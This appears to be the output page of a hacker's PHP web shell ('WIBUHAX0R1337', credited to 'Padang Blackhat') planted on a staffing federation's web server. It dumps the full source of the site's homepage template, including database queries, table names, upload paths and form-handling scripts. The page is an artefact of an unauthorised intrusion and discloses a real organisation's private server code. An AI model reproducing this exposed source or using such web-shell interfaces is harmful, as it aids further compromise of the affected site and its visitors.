-
✘✘✘ WIBUHAX0R1337 ✘✘✘
-
✘
PATCH :
/
home
/
indianstaffing
/
www
/
Upload File:
files >> /home/indianstaffing/www/index2.php
<?php include 'header.php'; $date = date('Y-m-d'); $conference_meet = GetDataByID('conference_meet',1); $res = mysqli_query($con, "select * from about"); $check = mysqli_num_rows($res); if ($check > 0) { $arr = mysqli_fetch_assoc($res); $blog_titlle = $arr['blog_titlle']; $blog_sub_title = $arr['blog_sub_title']; $know_more_url = $arr['know_more_url']; } $counting_query = mysqli_query($con, 'SELECT * FROM counting'); $counting = mysqli_num_rows($counting_query); if ($counting > 0) { $counting_data = mysqli_fetch_assoc($counting_query); $flexi_staff = $counting_data['flexi_staff']; $members = $counting_data['members']; $industries = $counting_data['industries']; $pincodes = $counting_data['pincodes']; } include 'custom.php' ?> <style> .content-part-event { height: 180px; } .content-part-event a { bottom: 10px; position: absolute; } ul.tabs { margin: 0px; padding: 0px; list-style: none; display: flex; justify-content: space-evenly; } ul.tabs li { background: none; color: #222; display: inline-block; padding: 10px 15px; cursor: pointer; margin: 0 5px; font-size: 18px; } ul.tabs li.current { /*background: #012654;*/ color: #012654; border-bottom: 5px solid #012654; } .tab-content { display: none; /*background: #ededed;*/ /*padding: 15px;*/ } .tab-content.current { display: inherit; } .rs-team.slider2.modify1.corporate2 { background: #fff; padding: 15px 0; box-shadow: 2px 2px 5px #00000025; } .post-desc a:hover { color: black; text-decoration: underline !important; } .conferences .owl-item .team-wrap .team-image{ overflow: hidden; background-size: cover; background-repeat: no-repeat; background-position: center; height: 305px; width: 300px; height: 100%; } .conferences .owl-item .team-wrap .team-image img{ border-radius: unset; } .isf-interview-carousel .owl-item img{ border-radius: unset; height: 440px; width: 100%; margin: auto; height: 100%; } .rs-team.slider2 .team-wrap{ padding-bottom: 0!important } .isf-interview-carousel .owl-item .cover_img{ overflow: hidden; border-radius: unset; background-image: url('assets/images/bg-circle.png'); background-size: cover; background-repeat: no-repeat; background-position: center; /*height: 440px;*/ } .article-icon-box .featured-icon{ overflow: hidden; background-size: cover; background-repeat: no-repeat; background-position: center; } .speakers_slider .owl-stage{ display:flex; align-items: center; } .home_banner_slider a .slider{ background-repeat: no-repeat;background-size: cover;background-position:center!important;width:100%!important; padding:0!important; } .rs-slider.slider10 .container-fluid{ padding-left: 0!important; padding-right: 0!important; } .rs-slider.slider10 .slider{ padding:0!important; } .rs-slider.slider10 .container-fluid .content-part{ padding: 45px 45px 55px 16px; } .rs-slider.slider10 .container-fluid .content-part{ left:17vw; border-radius: 5px; max-width: 315px; position: absolute; top: 53%; transform: translateY(-50%); height: 300px; } #rs-free-consultation .col-2 img{ border-radius: 80% 40%; transform: scale(1.1); } @media(max-width:900px){ .home_banner_slider a .slider{ background-size: contain!important; } .rs-slider.slider10.home_banner_slider .slider{ padding: 113px 0 50px!important; } #rs-free-consultation .col-2{ padding:0!important; } .speakers_slider.slider10 .owl-nav .owl-prev{ left:0!important; } .speakers_slider.slider10 .owl-nav .owl-next{ right:0!important; } .deepak_circle .deepak_text{ display: flex!important; align-items: center!important; justify-content: center!important; flex-wrap: wrap!important; } } .deepak_circle{ background-color: #003373; height: 350px; width:252px; border-radius: 100%; transform: rotate(40deg); position: absolute; left: 5%; top: 10px!important; } .deepak_circle .deepak_text{ width: 100%; height: 100%; transform: rotate(321deg)!important; } .deepak_circle .deepak_text h1{ font-size: 30px; line-height: 40px; padding:70px 10px 0 30px; margin-bottom: 0!important; } .deepak_circle .deepak_text p{ padding-right:20px; } @media(max-width:1300px){ .deepak_circle{ top:-10px!important; } } @media(max-width:1024px){ .deepak_circle{ top:-10px!important; width:232px!important; height:310px!important; } .deepak_circle .deepak_text h1{ font-size: 24px!important; line-height: 33px!important; } .rs-testimonial .container .owl-prev{ margin-left: -36px!important; } .rs-testimonial .container .owl-next{ margin-right:-36px!important; } } @media screen and (min-width: 900px) and (max-width: 1165px){ .service-wrap > .pre-event{ padding:7px!important; } } @media(max-width:900px){ .rs-slider.slider10.home_banner_slider .slider{ padding:0!important; } .rs-slider.slider10.home_banner_slider .slider .deepak_circle{ /*display: none!important;*/ height: 100px!important; width: 70px!important; top:0!important; } .deepak_circle .deepak_text h1{ font-size: 6px !important; line-height: 7px !important; padding: 15px 3px 0 14px!important; } .deepak_circle .deepak_text p{ font-size: 5px!important; padding-right: 0!important; padding-left:5px!important; } } </style> <input type="hidden" id="location"> <input type="hidden" id="resource_id"> <input type="hidden" id="agree_id"> <input type="hidden" id="brief_report"> <!-- popup modal --> <div class="modal" id="myModal" data-backdrop="static" data-keyboard="false"> <div class="modal-dialog"> <div class="modal-content"> <!-- Modal Header --> <div class="modal-header"> <h4 class="modal-title">I agree not to reproduce any part of the report without the written permission from Indian Staffing Federation. If any such action is found, I understand that I will be liable for legal action. In case I need to reproduce any graph/data/ findings or any part for reference I will seek written permission from ISF.</h4> <button type="button" class="close" data-dismiss="modal">×</button> </div> <!-- Modal footer --> <div class="modal-footer"> <a class="btn btn-primary text-white" onclick="agree()">Agree</a> <a class="btn btn-danger close text-white" style="font-weight: normal;font-size:1rem;padding: .375rem .75rem;line-height: 1.5;opacity: 1;font-size: 12px;border-radius: 50px;">Disagree</a> </div> </div> </div> </div> <div class="modal" id="formModal" data-backdrop="static" data-keyboard="false"> <div class="modal-dialog"> <div class="modal-content"> <div class="modal-body"> <div class="d-flex" style="justify-content: space-between;"> <h4 class="modal-title" style="margin-bottom: 5px;">Fill your details to download the pdf file</h4> <button type="button" class="close" data-dismiss="modal" aria-label="Close"> <span aria-hidden="true">×</span> </button> </div> <form id="form_id" > <div class="row"> <div class="col-md-12"> <div class="form-group"> <input type="text" class="form-control" placeholder="Name" id="name" required="required"> <!-- <span class="name_error_msg error_msg"></span> --> </div> <div class="form-group"> <input type="email" class="form-control" placeholder="Email*" id="email" required="required"> <span class="" style="font-size: 12px;">note:The report has been emailed you.</span> </div> <div class="form-group"> <input type="text" class="form-control" placeholder="Company*" id="company" required="required"> <!-- <span class="company_error_msg error_msg"></span> --> </div> <a class="btn btn-primary text-white" onclick="submitform('download')" >Brief report</a> <a class="btn btn-primary text-white" onclick="submitform('purchase')" >Detail report</a> <!-- <a class="btn btn-danger text-white close" style="font-size: 20px;font-weight: 400;">Detail Report</a> --> </div> </div> </form> </div> </div> </div> </div> <!-- Main content Start --> <div class="main-content"> <!-- Slider Start --> <div id="rs-slider" class="rs-slider slider10 home_banner_slider" style="overflow:visible;"> <div class="slider-carousel owl-carousel"> <!-- Slide 1 --> <?php $res = mysqli_query($con, "select * from slider where status = 1"); $check = mysqli_num_rows($res); if ($check > 0) { while ($rows = mysqli_fetch_assoc($res)) { ?> <a href="<?=$rows['url']?>"> <div class="slider"> <!-- <div class="slide1"></div> --> <div class="container-fluid"> <img src="admin/uploads/banner/<?=$rows['image']?>"> <div class="deepak_circle"> <div class="deepak_text"> <h1 class="sl-title white-color text-right"> <?php if(strlen($rows['heading'])>35){ print_r(substr( $rows['heading'],0,35).'..'); }else{ echo $rows['heading']; } ?> </h1> <p class="white-color text-center"> <?php if(strlen($rows['subheading'])>90){ print_r(substr( $rows['subheading'],0,90).'...'); }else{ echo $rows['subheading']; } ?> </p> </div> </div> </div> </div> </a> <?php } } ?> </div> </div> <!-- Slider End --> <!-- Why Choose Us Section Start --> <div class="rs-whychooseus style2 bg15 pb-20 md-pt-72 md-pb-80"> <div class="container"> <div class="row"> <div class="col-lg-12"> <div class="row gutter-16"> <div class="col-md-3 col-sm-3 col-3 sm-mb-30"> <div class="rs-counter-list"> <div class="counter-text"> <div class="rs-count pr-0"><?= $flexi_staff ?></div><span class="rs-count-num">M</span> <span class="title">Flexi Staff</span> </div> </div> </div> <div class="col-md-3 col-sm-3 col-3 sm-mb-30"> <div class="rs-counter-list"> <div class="counter-text"> <div class="rs-count pr-0"><?= $members ?></div><span class="rs-count-num">+</span> <span class="title">Members</span> </div> </div> </div> <div class="col-md-3 col-sm-3 col-3 sm-mb-30"> <div class="rs-counter-list"> <div class="counter-text"> <div class="rs-count pr-0"><?= $industries ?></div><span class="rs-count-num"></span> <span class="title">Industries</span> </div> </div> </div> <div class="col-md-3 col-sm-3 col-3 sm-mb-30"> <div class="rs-counter-list"> <div class="counter-text"> <div class="rs-count pr-0"><?= $pincodes ?></div><span class="rs-count-num">K</span> <span class="title">Pincodes</span> </div> </div> </div> </div> </div> </div> </div> </div> <!-- Why Choose Us Section End --> <!-- Why Choose Us Section Start --> <div class="rs-whychooseus style2 bg15 pb-30 md-pt-72 md-pb-80"> <div class="container"> <div class="sec-title rs-whychooseus style2 md-mb-50 sm-mb-42"> <div class="first-half text-right"> <!-- <div class="sub-title primary">Premium Services</div> --> <h3 class="title mb-15"><?= $blog_titlle ?></h3> </div> <div class="last-half"> <p class="mb-0"><?= $blog_sub_title ?> </p> <a class="readon-outline-dark modify mt-1" href="<?= $know_more_url ?>">Know More</a> </div> </div> </div> </div> <!-- Why Choose Us Section End --> <!-- Testimonial Section Start --> <section> <div class="rs-testimonial style5 light-blue-bg pt-30 md-pt-65" style="background-image:none;"> <div class="sec-title text-center mb-60"> <!-- <div class="sub-title primary">Reviews</div> --> <h2 class="title">Latest Developments</h2> </div> <div class="container"> <div class="rs-carousel isf-interview-carousel owl-carousel dot-style1" data-bs-touch="false" data-loop="true" data-items="1" data-margin="30" data-autoplay="false" data-hoverpause="true" data-autoplay-timeout="5000" data-smart-speed="800" data-dots="false" data-nav="false" data-nav-speed="false" data-center-mode="false" data-mobile-device="1" data-mobile-device-nav="false" data-mobile-device-dots="false" data-ipad-device="1" data-ipad-device-nav="false" data-ipad-device-dots="false" data-ipad-device2="1" data-ipad-device-nav2="false" data-ipad-device-dots2="false" data-md-device="1" data-lg-device="1" data-md-device-nav="true" data-md-device-dots="false" data-lg-device-nav="true" data-lg-device-dots="false"> <?php $res = mysqli_query($con, "select * from latest_development where status = 1 order by added_on desc"); $check = mysqli_num_rows($res); if ($check > 0) { while ($rows = mysqli_fetch_assoc($res)) { ?> <div class="content-wrap isf-interview md-flex-column"> <div class="col-lg-7 col-md-7 col-sm-12 order-2 order-lg-1 desc"> <h3><?= $rows['heading'] ?></h3> <p><?= $rows['description'] ?></p> <div class="btn-part mt-43"> <a class="readon-outline-dark modify" href="<?= $rows['url'] ?>">Know More</a> </div> <!-- <div class="detail-part"> <h5 class="name">Ronda Rozy</h5> <div class="designation">CEO, XYZ Inc.</div> </div> --> </div> <div class="col-lg-5 col-md-5 col-sm-12 md-mb-32 order-1 order-lg-2 testi-meta"> <div class="cover_img" style="background-image:url('<?= $weburl; ?>admin/uploads/advocacy/<?= "events" . $rows['image']; ?>')"> <img width="417" src="assets/images/Deepak-Isf.png" alt="Team Image"> </div> </div> </div> <?php } } ?> </div> </div> </div> </section> <!-- Testimonial Section End --> <!-- About Section Start --> <div id="rs-about" class="rs-about style1 bg1 md-pt-80 pt-40 conferences"> <div class="container"> <div class="sec-title text-center mb-10"> <!-- <div class="sub-title primary">Reviews</div> --> <h2 class="title">Conferences & Meets</h2> </div> <div class="row y-bottom"> <div class="col-lg-4 md-pl-15 md-pr-15 padding-0"> <div class="rs-carousel owl-carousel dot-style1" data-loop="true" data-items="1" data-margin="30" data-autoplay="true" data-hoverpause="true" data-autoplay-timeout="2000" data-smart-speed="500" data-dots="false" data-nav="false" data-nav-speed="false" data-center-mode="false" data-mobile-device="1" data-mobile-device-nav="false" data-mobile-device-dots="false" data-ipad-device="1" data-ipad-device-nav="false" data-ipad-device-dots="false" data-ipad-device2="2" data-ipad-device-nav2="false" data-ipad-device-dots2="false" data-md-device="1" data-lg-device="1" data-md-device-nav="false" data-md-device-dots="false"> <?php foreach(unserialize($conference_meet->image) as $value){ ?> <div class="team-wrap"> <div class="team-image" style="background-image: url('<?=$weburl?>/admin/uploads/confrences/<?=$value?>')"> <img width="417" src="assets/images/White-Isf.png" alt=""> </div> </div> <?php } ?> </div> </div> <div class="col-lg-8 pl-66 md-pl-15 md-pt-42"> <div class="sec-title"> <!-- <div class="sub-title primary">Events</div> --> <!-- <h2 class="title">Events</h2> --> <div class="blog-meta"> <div class="user-data"> </div> <!-- <div class="date"> <span class="mr-40"><i class="fa fa-user"></i> admin</span> <span><i class="fa fa-calendar"></i> 06 Sep 2019</span> </div> --> </div> <h2 class="title mt-15 mb-15" style="font-size: 36px;line-height: 48px;font-weight: 300;"> <?=$conference_meet->heading?> </h2> <div class="desc text-justify"> <?=$conference_meet->description?> </div> <div class="btn-part mt-43"> <a class="readon-outline-dark mr-20 modify" href="<?=$conference_meet->url?>">Register Now</a> <a class="readon-outline-dark modify" href="event.php">Click for Future Events</a> </div> </div> </div> </div> <div class="col-lg-12 col-sm-12 pl-66"> </div> </div> </div> <section class="py-4"> <div class="container"> <div class="row"> <div class="col-md-12 col-sm-12 col-lg-6 border-right"> <div class="text-center"> <h3 class="title mb-15">Upcoming Events</h3> </div> <div class="row gutter-16"> <?php $i = 1; $upcomingevent = mysqli_query($con, "SELECT * FROM `events` WHERE status = 1 and added_on >= '$date' order by added_on desc limit 4"); if (mysqli_num_rows($upcomingevent) > 0) { while ($rows = mysqli_fetch_assoc($upcomingevent)) { ?> <div class="col-lg-3 col-sm-6 mb-16 col-6"> <div class="service-wrap"> <div class="content-part-event pre-event"> <p class="title mb-10"> <?php echo $rows['heading'] ?> </p> <a class="modify" href="eventdetails.php?id=<?php echo $rows['id'] ?>" style="padding-top:8px;">View Details</a> </div> </div> </div> <?php $i++; } } ?> </div> </div> <div class="col-md-12 col-sm-12 col-lg-6 border-left"> <div class="text-center"> <h3 class="title mb-15">Past Events</h3> </div> <div class="row gutter-16"> <?php $i = 1; $selectsql = mysqli_query($con, "SELECT * FROM `events` WHERE status = 1 and added_on < '$date' order by added_on desc limit 4"); if (mysqli_num_rows($selectsql) > 0) { while ($rows = mysqli_fetch_assoc($selectsql)) { ?> <div class="col-lg-3 col-sm-6 mb-16 col-6"> <div class="service-wrap"> <div class="content-part-event pre-event"> <p class="title mb-10"> <?php if(strlen($rows['heading'])>60){ print_r(substr( $rows['heading'],0,60).'...'); }else{ echo $rows['heading']; } ?> </p> <a class="modify" href="eventdetails.php?id=<?php echo $rows['id'] ?>" style="padding-top:8px;">View Details</a> </div> </div> </div> <?php $i++; } } ?> </div> </div> </div> </div> </section> <!-- About Section Start --> <div id="rs-about" class="rs-about style1 gray-bg2 bg1 md-pt-0 md-pb-20 pb-40" style="background: #f3faff;"> <div class="container"> <!-- <div class="sec-title text-center mb-20"> <div class="sub-title primary">Reviews</div> <h2 class="title">Current Affairs</h2> </div> --> <div class="row"> <div class="col-lg-12 col-md-12 col-sm-12 col-xs-12 mt-20 order-1 order-md-0 order-lg-0" text="center"> <ul class="tabs"> <li class="tab-link current" data-tab="tab-1">Publications</li> <li class="tab-link" data-tab="tab-2">Media</li> <li class="tab-link" data-tab="tab-3">Interviews</li> <li class="tab-link" data-tab="tab-4">Become a member</li> </ul> </div> </div> <div class="y-bottom md-flex-col-reverse"> <div id="tab-1" class="tab-content current"> <!--testimonial-section--> <section class="cmt-row cmt-bgcolor-grey mt-30 clearfix"> <div class="container"> <div class="row"> <div class="col-lg-4 col-xs-12 col-md-12 df-md"> <div class="row"> <?php $selectsql = mysqli_query($con, "SELECT * FROM `research_doc` where status=1 and category =1 and publication=1 order by added_on DESC limit 2"); if (mysqli_num_rows($selectsql) > 0) { while ($rows = mysqli_fetch_assoc($selectsql)) { ?> <div class="col-md-12"> <div class="article-icon-box icon-align-before-content style2 ma-20 align-items-center"> <div class="flex-item featured-icon" > <img src="<?=$weburl?>isf-images/research(new)-img/<?= $rows['image']; ?>" alt=""> </div> <div class="flex-item featured-content pl-20"> <div class="post-meta"> </div> <div class="featured-title"> <h5><a onclick ="openModal('<?= $rows['url'] ?>',<?= $rows['id'] ?>,'<?= $rows['report'] ?>');"><?= $rows['heading'] ?></a></h5> </div> </div> </div> </div> <?php } } ?> </div> </div> <div class="col-lg-4 col-xs-12 col-md-12 df-md"> <div class="row"> <?php $selectsql = mysqli_query($con, "SELECT * FROM `research_doc` where status=1 and category =2 and publication=1 order by added_on DESC limit 2"); if (mysqli_num_rows($selectsql) > 0) { while ($rows = mysqli_fetch_assoc($selectsql)) { ?> <div class="col-md-12"> <div class="article-icon-box icon-align-before-content style2 ma-20 align-items-center"> <div class="flex-item featured-icon"> <img src="<?=$weburl?>isf-images/research(new)-img/<?= $rows['image']; ?>" alt=""> </div> <div class="flex-item featured-content pl-20"> <div class="post-meta"> </div> <div class="featured-title"> <h5><a onclick ="openModal('<?= $rows['url'] ?>',<?= $rows['id'] ?>,'<?= $rows['report'] ?>');"><?= $rows['heading'] ?></a></h5> </div> </div> </div> </div> <?php } } ?> </div> </div> <div class="col-lg-4 col-xs-12 col-md-12 df-md"> <div class="row"> <?php $selectsql = mysqli_query($con, "SELECT * FROM `research_doc` where status=1 and category =3 and publication=1 order by added_on DESC limit 2"); if (mysqli_num_rows($selectsql) > 0) { while ($rows = mysqli_fetch_assoc($selectsql)) { ?> <div class="col-md-12"> <div class="article-icon-box icon-align-before-content style2 ma-20 align-items-center"> <div class="flex-item featured-icon"> <img src="<?=$weburl?>isf-images/research(new)-img/<?= $rows['image']; ?>" alt=""> </div> <div class="flex-item featured-content pl-20"> <div class="post-meta"> </div> <div class="featured-title"> <h5><a onclick ="openModal('<?= $rows['url'] ?>',<?= $rows['id'] ?>,'<?= $rows['report'] ?>');"><?= $rows['heading'] ?></a></h5> </div> </div> </div> </div> <?php } } ?> </div> </div> </div> <div class="row"> <div class="col-lg-12 col-xs-12 mt-30 text-center"> <a class="cmt-btn readon-outline-dark btn-inline cmt-btn-size-md cmt-icon-btn-left cmt-btn-color-skincolor" href="research.php" title="">View All</a> </div> </div> </div> </section> <!--testimonial-section--> </div> <div id="tab-2" class="tab-content" style="margin-top: 20px;"> <!-- Consultans Section Start --> <div id="rs-free-consultation" class="rs-free-consultation style2 "> <div class="container"> <div class="row y-middle" style="align-items: flex-start;"> <div class="col-lg-6 col-md-12 col-sm-12 md-mb-50"> <?php $selectsql = mysqli_query($con, "SELECT * FROM `newsmediacoverage` ORDER BY added_on DESC LIMIT 5"); if (mysqli_num_rows($selectsql) > 0) { while ($rows = mysqli_fetch_assoc($selectsql)) { ?> <div class="mb-20 row"> <div class="col-md-2 col-2"> <img src="assets/images/articles/b_thumbb-01.jpg" alt=""> </div> <div class="post-desc col-md-10 col-10" style="font-size: 14px;"> <a href="<?php echo $rows['links']; ?>" target="_blank"><?php echo $rows['heading']; ?></a> <div class="date-post mt-10"> <i class="fa fa-calendar"></i> <span class="mr-35"><?php echo $rows['added_on']; ?></span> <span><strong>Published By:</strong> <?php echo $rows['speakers']; ?></span> </div> </div> </div> <?php } } ?> <div class="text-center"> <a class="readon-outline-dark services-view mt-20" href="mediaroom.php">View All</a> </div> </div> <div class="col-lg-6 pr-30 md-pr-15 pl-65 md-pl-15"> <!-- Team Section Start --> <div class="rs-team slider2 modify1 corporate2"> <div class="container"> <div class="rs-carousel owl-carousel dot-style1" data-loop="true" data-items="1" data-margin="30" data-autoplay="true" data-hoverpause="true" data-autoplay-timeout="5000" data-smart-speed="800" data-dots="false" data-nav="false" data-nav-speed="false" data-center-mode="false" data-mobile-device="1" data-mobile-device-nav="false" data-mobile-device-dots="false" data-ipad-device="2" data-ipad-device-nav="false" data-ipad-device-dots="false" data-ipad-device2="2" data-ipad-device-nav2="false" data-ipad-device-dots2="false" data-md-device="1" data-lg-device="1" data-md-device-nav="false" data-md-device-dots="false"> <?php $i = 1; $selectsql = mysqli_query($con, "SELECT * FROM `videocoverage` LIMIT 10"); if (mysqli_num_rows($selectsql) > 0) { while ($rows = mysqli_fetch_assoc($selectsql)) { ?> <div class="team-wrap"> <div class="team-img"> <iframe width="100%" height="250" src="<?= $rows['links']; ?>" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe> </div> <div class="content-part pl-15 pr-15"> <div class="blog-meta mt-15 mb-10" style="display: flex;justify-content: space-between;"> <div class="date"> <i class="fa fa-calendar mr-6"></i> <?= $rows['added_on']; ?> </div> <div class="date"> <i class="fa fa-play-circle mr-6"></i> <strong>Channel:</strong> <?= $rows['channel']; ?> </div> </div> <h5 class="title mb-2"><a href="#" style="font-size: 14px;"><?= $rows['description']; ?></a></h5> <p class="text-justify mb-2" style="font-size: 14px;"><?= $rows['description']; ?></p> <div class="blog-meta"> <div class="user-data" style="font-size: 14px;"> <i class="fa fa-user mr-6"></i><strong> <?= $rows['speakers']; ?></strong> </div> </div> </div> </div> <?php } } ?> </div> </div> </div> <!-- Team Section End --> </div> </div> </div> </div> <!-- Consultans Section End --> </div> <div id="tab-3" class="tab-content"> <!-- Testimonial Section Start --> <div class="rs-testimonial style5 pt-30 md-pt-65" style="background-image: unset;"> <!-- <div class="sec-title text-center mb-60"> <div class="sub-title primary">Reviews</div> <h2 class="title">Featured Interviews</h2> </div> --> <div class="container"> <div class="rs-carousel isf-interview-carousel owl-carousel dot-style1" data-loop="true" data-items="1" data-margin="30" data-autoplay="false" data-hoverpause="true" data-autoplay-timeout="5000" data-smart-speed="800" data-dots="false" data-nav="true" data-nav-speed="false" data-center-mode="false" data-mobile-device="1" data-mobile-device-nav="false" data-mobile-device-dots="false" data-ipad-device="1" data-ipad-device-nav="false" data-ipad-device-dots="false" data-ipad-device2="1" data-ipad-device-nav2="false" data-ipad-device-dots2="false" data-md-device="1" data-lg-device="1" data-md-device-nav="true" data-md-device-dots="false" data-lg-device-nav="true" data-lg-device-dots="false"> <?php $selectsql = mysqli_query($con, "SELECT * FROM `interview` where status =1 "); if (mysqli_num_rows($selectsql) > 0) { while ($rows = mysqli_fetch_assoc($selectsql)) { ?> <div class="content-wrap isf-interview md-flex-column"> <div class="col-lg-5 col-md-5 col-sm-12 md-mb-32 testi-meta"> <div class="img-part" style="background-image: url('<?=$weburl?>admin/uploads/banner/<?= $rows['images']; ?>')"> <img class="bdru-40" src="assets/images/Deepak-Isf.png" alt=""> </div> </div> <div class="col-lg-7 col-md-7 col-sm-12 desc"> <p style="color:#1c1b1b;font-weight: bold;margin-bottom: 0;"><?= $rows['question']; ?></p> <p style="margin-bottom: 5px;"> <?php if (strlen($rows['short_description']) > 200) { print_r(substr($rows['short_description'], 0, 200) . '...'); } else { echo $rows['short_description']; } ?> </p> <div class="detail-part"> <h5 style="margin-bottom: 0;font-weight: bold;" class="name"><?= $rows['heading']; ?></h5> <div class="designation"><?= $rows['alttag']; ?></div> </div> <div class="text-center"> <a class="readon-outline-dark services-view mt-50" href="interviews.php?id=<?= $rows['id'] ?>" style="margin-top: 5px;">Read More</a> </div> </div> </div> <?php } } ?> </div> </div> </div> <!-- Testimonial Section End --> </div> <div id="tab-4" class="tab-content"> <div class="gallery_product col-lg-12 col-md-12 col-sm-12 col-xs-6 mb-0 filter member"> <div class="container"> <!-- row --> <div class="row"> <div class="col-lg-12"> <!-- section title --> <div class="section-title title-style-center_text"> <div class="title-header text-center"> <!-- <h5>MEMBERSHIP</h5> --> <!-- <h2 class="title text-white" style="font-weight: 100;">Become a <strong>Member</strong></h2> --> </div> </div><!-- section title end --> </div> </div><!-- row end --> <!-- row --> <div class="row"> <div class="col-lg-12"> <div class="featuredbox-number"> <div class="row"> <div class="col-lg-3 col-md-6 col-sm-6"> <!--featured-icon-box--> <div class="featured-icon-box icon-align-top-content style6"> <div class="featured-icon"> <div class="cmt-icon cmt-icon_element-onlytxt cmt-icon_element-color-white cmt-icon_element-size-md"> <img src="assets/images/member/form.png" alt=""> <span class="fea_num cmt-textcolor-darkgrey"> <i class="cmt-num ti-info"></i> </span> </div> </div> <div class="featured-content"> <div class="featured-title"> <h5>Membership Form</h5> </div> <div class="featured-desc"> <p>You can register yourself online for our services. Fill up form details and we get back to you.</p> </div> </div> </div><!-- featured-icon-box end--> </div> <div class="col-lg-3 col-md-6 col-sm-6"> <!--featured-icon-box--> <div class="featured-icon-box icon-align-top-content style6"> <div class="featured-icon"> <div class="cmt-icon cmt-icon_element-onlytxt cmt-icon_element-color-white cmt-icon_element-size-md"> <img src="assets/images/member/code.png" alt=""> </div> </div> <div class="featured-content"> <div class="featured-title"> <h5>Code of Conduct</h5> </div> <div class="featured-desc"> <p>Our experts suggest documentation submission as per country’s policy and applicant base.</p> </div> </div> </div><!-- featured-icon-box end--> </div> <div class="col-lg-3 col-md-6 col-sm-6"> <!--featured-icon-box--> <div class="featured-icon-box icon-align-top-content style6"> <div class="featured-icon"> <div class="cmt-icon cmt-icon_element-onlytxt cmt-icon_element-color-white cmt-icon_element-size-md"> <img src="assets/images/member/criteria.png" alt=""> </div> </div> <div class="featured-content"> <div class="featured-title"> <h5>Criteria and Fees</h5> </div> <div class="featured-desc"> <p>After reviewing your documents we will get in touch with you for the next personal meeting for guidance.</p> </div> </div> </div><!-- featured-icon-box end--> </div> <div class="col-lg-3 col-md-6 col-sm-6"> <!--featured-icon-box--> <div class="featured-icon-box icon-align-top-content style6"> <div class="featured-icon not-after"> <div class="cmt-icon cmt-icon_element-onlytxt cmt-icon_element-color-white cmt-icon_element-size-md"> <img src="assets/images/member/helpline.png" alt=""> </div> </div> <div class="featured-content"> <div class="featured-title"> <h5>Membership Helpline</h5> </div> <div class="featured-desc"> <p>And you are all ready to apply. Professionals suggestions are proven 100% guaranteed.</p> </div> </div> </div><!-- featured-icon-box end--> </div> <div class="col-md-12"> <div class="submit-btn text-center mt-43"> <a href="membership-form.php" class="readon-outline min-width-200" style="background:#003373;color:#fff;font-size: 22px;">Register</a> </div> </div> </div> </div> </div> </div><!-- row end --> </div> </div> </div> </div> </div> </div> <!-- About Section End --> <!-- Partner Section Start --> <div class="rs-partner pt-50 pb-30 md-pt-20 md-pb-20"> <div class="container"> <div class="row"> <div class="col-lg-12"> <!-- section title --> <div class="section-title title-style-center_text"> <div class="title-header text-center"> <!-- <h5>MEMBERSHIP</h5> --> <h2 class="title">Our Members</h2> </div> </div><!-- section title end --> </div> </div><!-- row end --> <div class="rs-carousel owl-carousel speakers_slider slider10" data-loop="true" data-items="5" data-margin="30" data-autoplay="true" data-hoverpause="true" data-autoplay-timeout="5000" data-smart-speed="800" data-dots="false" data-nav="true" data-nav-speed="true" data-center-mode="false" data-mobile-device="2" data-mobile-device-nav="true" data-mobile-device-dots="false" data-ipad-device="3" data-ipad-device-nav="true" data-ipad-device-dots="false" data-ipad-device2="2" data-ipad-device-nav2="true" data-ipad-device-dots2="false" data-md-device="4" data-md-device-nav="true" data-md-device-dots="false"> <?php $res = mysqli_query($con, "select * from members_logo WHERE status=1"); $check = mysqli_num_rows($res); if ($check > 0) { while ($rows = mysqli_fetch_assoc($res)) { ?> <div class="partner-item"> <a href="<?php echo $rows['links']; ?>" target="_blank"> <img src="admin/uploads/members-logo/<?php echo $rows['memberslogo']; ?>" alt="<?php echo $rows['alt']; ?>"> </a> </div> <?php } } ?> <?php $res = mysqli_query($con, "select * from professional_members_logo WHERE status=1"); $check = mysqli_num_rows($res); if ($check > 0) { while ($rows = mysqli_fetch_assoc($res)) { ?> <div class="partner-item"> <a href="<?php echo $rows['links']; ?>" target="_blank"><img src="admin/uploads/members-logo/<?php echo $rows['memberslogo']; ?>" alt="<?php echo $rows['alt']; ?>"></a> </div> <?php } } ?> </div> <div class="row"> <div class="col-md-12 text-center mt-30 mb-30"> <a href="current-member.php" class="cmt-btn readon-outline-dark btn-inline cmt-btn-size-md cmt-icon-btn-left cmt-btn-color-skincolor">View All</a> </div> </div> </div> </div> <!-- Partner Section End --> </div> <!-- Main content End --> <?php include 'footer.php' ?> <script type="text/javascript"> function openModal(url,id,report) { $("#location").val(url); $("#brief_report").val(report); $("#resource_id").val(id); $("#myModal").modal('show'); }; function agree(){ var url = $("#location").val(); var resource_id = $("#resource_id").val(); var brief_report = $("#brief_report").val(); $.ajax({ url: 'Submit_resources_visitors.php', type: "POST", data: { agree : 1,resource_id: resource_id,brief_report: brief_report}, success: function(value) { // console.log(value); if(value!='failed'){ $("#agree_id").val(value); $("#myModal").modal('hide'); $("#formModal").modal('show'); }else{ console.log('not inserted'); } } }); } $("#formModal .close").click(function(){ $("#formModal").modal('hide'); $('#form_id').trigger("reset"); }); $("#myModal .close").click(function(){ $("#myModal").modal('hide'); }); function submitform(value){ var name = $('#name').val(); var email = $('#email').val(); var brief_report = $('#brief_report').val(); var company = $('#company').val(); var agree_id = $("#agree_id").val(); if(name!='' && email!='' && company!=''){ if(value=='download'){ $.ajax({ url: 'Submit_resources_visitors.php', type: "POST", data: { name : name,email : email, company : company,agree_id:agree_id,brief_report:brief_report,value:1}, success: function(value) { console.log(value); if(value=='success'){ $("#formModal").modal('hide'); $('#form_id').trigger("reset"); alert('the brief report has been sent on your email'); location.reload(); }else{ $("#formModal").modal('hide'); $('#form_id').trigger("reset"); alert('something went wrong please try again'); location.reload(); } } }); }else{ $.ajax({ url: 'Submit_resources_visitors.php', type: "POST", data: { name : name,email : email, company : company,agree_id:agree_id}, success: function(value) { console.log(value); if(value=='success'){ $("#formModal").modal('hide'); $('#form_id').trigger("reset"); var url = $("#location").val(); window.open(url, '_blank'); location.reload(); }else{ alert('something went wrong please try again'); $("#formModal").modal('hide'); $('#form_id').trigger("reset"); location.reload(); } } }); } } } function myfunction(val){ if(val=='YES'){ var url = $("#location").val(); window.open(url, '_blank'); $("#myModal").modal('hide'); }else{ window.location.replace("index.php"); $("#myModal").modal('hide'); } } </script>
2022 - 2023 Copyright By Lutfifakee || Padang Blackhat ♥